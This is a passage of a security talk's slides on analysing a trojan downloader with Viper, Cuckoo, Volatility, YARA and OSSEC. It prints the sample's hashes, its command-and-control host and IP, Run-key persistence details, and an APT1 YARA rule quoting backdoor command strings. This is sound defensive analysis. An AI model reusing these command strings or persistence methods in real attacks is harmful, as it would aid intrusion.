| data/yara/apt1.yara | | 11 | data/yara/GeorBotMemory.yara | | 12 | data/yara/rats.yara | | 13 | data/yara/embedded.yara | | 14 | data/yara/urausy_skypedat.yar | | 15 | data/yara/fpu.yara | +----+-----------------------------------+
  • 15. Static Analysis – Trojan Dropper @santiagobassett viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe sections [*] PE Sections: +--------+---------+-------------+-------------+---------------+ | Name | RVA | VirtualSize | RawDataSize | Entropy | +--------+---------+-------------+-------------+---------------+ | .text | 0x1000 | 0xbe8f | 49152 | 6.52204488284 | | .rdata | 0xd000 | 0x1855 | 6656 | 5.17849300065 | | .data | 0xf000 | 0x19cb8 | 512 | 1.31023024266 | | .CRT | 0x29000 | 0x10 | 512 | 0.21310128451 | | .rsrc | 0x2a000 | 0x7fd8 | 32768 | 5.79943302325 | +--------+---------+-------------+-------------+---------------+ viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe imports ... [*] DLL: ADVAPI32.dll - 0x40d000: RegCloseKey - 0x40d004: RegOpenKeyExA - 0x40d008: RegQueryValueExA - 0x40d00c: RegCreateKeyExA - 0x40d010: RegSetValueExA ... viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe compiletime [*] Compile Time: 2010-03-14 23:27:58 viper 0A37D49E798F50C8F1010D5CFDE0E851 > yara scan [*] Scanning 0A37D49E798F50C8F1010D5CFDE0E851 (dbf0436908c9d900e69ea2a108f08061786d299b511265b78620a4401361084b) viper 0A37D49E798F50C8F1010D5CFDE0E851 > fuzzy [*] 1 relevant matches found +-------+----------------------------------+------------------------------------------------------------------+ | Score | Name | SHA256 | +-------+----------------------------------+------------------------------------------------------------------+ | 68% | 003EE3D21DF82975337AE976F8BA67CC | 2803fba5fbe908f6151597c2a387caef8f00a5f0f194bfc6b4d9f89026d53621 | +-------+----------------------------------+------------------------------------------------------------------+ viper 0A37D49E798F50C8F1010D5CFDE0E851 > virustotal [*] VirusTotal Report: +----------------------+---------------------------------------------- + | Antivirus | Signature | +----------------------+---------------------------------------------- + | nProtect | Trojan.Downloader.JKVR | | McAfee | Artemis!0A37D49E798F | | K7GW | Trojan-Downloader | | NANO-Antivirus | Trojan.Win32.Agent.hbmsz | | Symantec | Downloader | | TotalDefense | Win32/FakeDoc_i | | TrendMicro-HouseCall | TROJ_DLOADER.VTG | | Avast | Win32:Trojan-gen | | ClamAV | Trojan.Downloader-83571 | | Kaspersky | Trojan-Downloader.Win32.Agent.thb | | BitDefender | Trojan.Downloader.JKVR | | Agnitum | Trojan.DL.Agent!virRS0ijj7k | | Emsisoft | Trojan.Downloader.JKVR (B) | | Comodo | TrojWare.Win32.TrojanDownloader.Agent.thb_30 | | F-Secure | Trojan.Downloader.JKVR | | TrendMicro | TROJ_DLOADER.VTG | | McAfee-GW-Edition | Artemis!0A37D49E798F | | Sophos | Troj/DwnLdr-IYR | | Jiangmin | TrojanDownloader.Agent.boly | | Antiy-AVL | Trojan/Win32.Agent.gen | | Microsoft | TrojanDownloader:Win32/Pingbed.A | | Commtouch | W32/Downloader.NIHT-8726 | | AhnLab-V3 | Dropper/Malware.101512
  • 16. Fuzzy hash match info @santiagobassett
  • 17. Dynamic Analysis - Cuckoo @santiagobassett Automated malware analysis. Runs binary files in virtual machines to study their behavior. • Traces Win32 API calls • Files created, deleted and downloaded • Memory dumps of malicious processes • Network traffic pcaps Integrated with yara, virustotal and volatility among other tools. Supports Virtualbox KVM and Vmware.
  • 18. Dynamic Analysis – Trojan Dropper @santiagobassett
  • 19. Behavioral Analysis – Filesystem @santiagobassett
  • 20. Behavioral Analysis - Filesystem @santiagobassett
  • 21. Behavioral Analysis – Network @santiagobassett
  • 22. Behavioral Analysis – Network @santiagobassett
  • 23. Behavioral Analysis - Network @santiagobassett santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ sudo tcpdump -s 0 -XX -AA -nn -r dump.pcap | grep -A 4 63.233.155.6 reading from file dump.pcap, link-type EN10MB (Ethernet) 23:32:20.655808 IP 8.8.8.8.53 > 192.168.56.103.63943: 53551 1/0/0 A 63.233.155.6 (50) 0x0000: 0800 2723 f165 0a00 2700 0000 0800 4500 ..'#.e..'.....E. 0x0010: 004e eca8 0000 2d11 97d7 0808 0808 c0a8 .N....-......... 0x0020: 3867 0035 f9c7 003a ef52 d12f 8180 0001 8g.5...:.R./.... 0x0030: 0001 0000 0000 0377 7777 0867 6172 7968 .......www.garyh -- 23:32:20.662766 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0 0x0000: 0a00 2700 0000 0800 2723 f165 0800 4500 ..'.....'#.e..E. 0x0010: 0034 10ab 4000 8006 161a c0a8 3867 3fe9 .4..@.......8g?. 0x0020: 9b06 c00e 0050 9be7 3c9f 0000 0000 8002 .....P..<....... 0x0030: 2000 e231 0000 0204 05b4 0103 0302 0101 ...1............ -- 23:32:23.663174 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0 0x0000: 0a00 2700 0000 0800 2723 f165 0800 4500 ..'.....'#.e..E. 0x0010: 0034 10c2 4000 8006 1603 c0a8 3867 3fe9 .4..@.......8g?. 0x0020: 9b06 c00e 0050 9be7 3c9f 0000 0000 8002 .....P..<....... 0x0030: 2000 e231 0000 0204 05b4 0103 0302 0101 ...1............ -- 23:32:29.661778 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,nop,sackOK], length 0 0x0000: 0a00 2700 0000 0800 2723 f165 0800 4500 ..'.....'#.e..E. 0x0010: 0030 10dc 4000 8006 15ed c0a8 3867 3fe9 .0..@.......8g?. 0x0020: 9b06 c00e 0050 9be7 3c9f 0000 0000 7002 .....P..<.....p. 0x0030: 2000 f63a 0000 0204 05b4 0101 0402 ...:..........
  • 24. Behavioral Analysis – Registry @santiagobassett
  • 25. Memory Analysis - Volatility @santiagobassett santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ vol.py psxview --profile=Win7SP1x86 -f memory.dmp Volatility Foundation Volatility Framework 2.4 Offset(P) Name PID pslist psscan thrdproc pspcid csrss session deskthrd ---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- 0x7b6fa500 audiodg.exe 960 True False True True True True True 0x7b7afd40 sppsvc.exe 1780 True False True True True True True 0x779fb808 svchost.exe 724 True False True True True True True 0x7b7be710 svchost.exe 1892 True False True True True True True 0x7c4ea7d8 VBoxService.ex 624 True False True True True True True 0x7b6f4030 svchost.exe 900 True False True True True True True 0x7b7bb618 svchost.exe 3376 True False True True True True True 0x7cd99a58 AcroRD32.exe 3080 True False True True True True True 0x7b4fa030 SearchIndexer. 360 True False True True True True True 0x7b94a858 taskhost.exe 2920 True False True True True True True … santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ vol.py memdump --profile=Win7SP1x86 -f memory.dmp -D ./ -p 3080 Volatility Foundation Volatility Framework 2.4 ************************************************************************ Writing AcroRD32.exe [ 3080] to 3080.dmp santiago@cuckoo:~$ strings 3080.dmp | grep -i garyhart www.garyhart.com w.garyhart.com w.garyhart.com w.garyhart.com www.garyhart.com st: www.garyhart.com w.garyhart.com tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm www.garyhart.com http://www.garyhart.com/nfuse.htm
  • 26. Memory Analysis - Yara @santiagobassett santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ yara /home/santiago/viper/data/yara/apt1.yara 3080.dmp APT1_WEBC2_UGX 3080.dmp rule APT1_WEBC2_UGX { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1” strings: $persis = "SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN" wide ascii $exe = "DefWatch.exe" wide ascii $html = "index1.html" wide ascii $cmd1 = "!@#tiuq#@!" wide ascii $cmd2 = "!@#dmc#@!" wide ascii $cmd3 = "!@#troppusnu#@!" wide ascii condition: 3 of them }
  • 27. OSSEC - Rootcheck @santiagobassett Used for rootkits and malware detection. It can be used to: • Look for suspicious files. • Inspect files and registry keys for common rootkits/malware entries. • Look for hidden processes and network ports.
  • 28. OSSEC – Rule for Trojan Dropper @santiagobassett [Trojan Dropper] [all] [0A37D49E798F50C8F1010D5CFDE0E851] f:C:UsersIEUserAppDataLocalTempAcroRD32.exe; r:HKEY_USERSS-1-5-21-3463664321-2923530833-3546627382-1000 SoftwareMicrosoftWindowsCurrentVersionRun -> Acroread -> r:AcroRD32.exe; p:r:AcroRD32.exe; /var/ossec/etc/shared/win_malware_rcl.txt
  • 29. OSSEC – Alert for Trojan Dropper @santiagobassett alienvault:/var/ossec/bin# ./rootcheck_control -L -i 001 Policy and auditing events for agent 'Windows7 (001) - 172.16.126.134': Resolved events: ** No entries found. Last scan: 2014 Sep 12 18:54:24 Windows Audit: Null sessions allowed. Windows Malware: Trojan Dropper. File: C:UsersIEUserAppDataLocalTempAcroRD32.exe. Reference: 0A37D49E798F50C8F1010D5CFDE0E851 .
  • 30. Demo – Alert for Trojan Dropper @santiagobassett
  • 31. Future Work @santiagobassett • Use/create Cuckoo signatures to identify different malware patterns (droppers, downloaders, trojans, rootkits, …) • Create Cuckoo reporting module to report (JSON) on those patterns that OSSEC can detect. • Python tool to parse module output and generate rootcheck rules. • Add/improve OSSEC malware detection capabilities.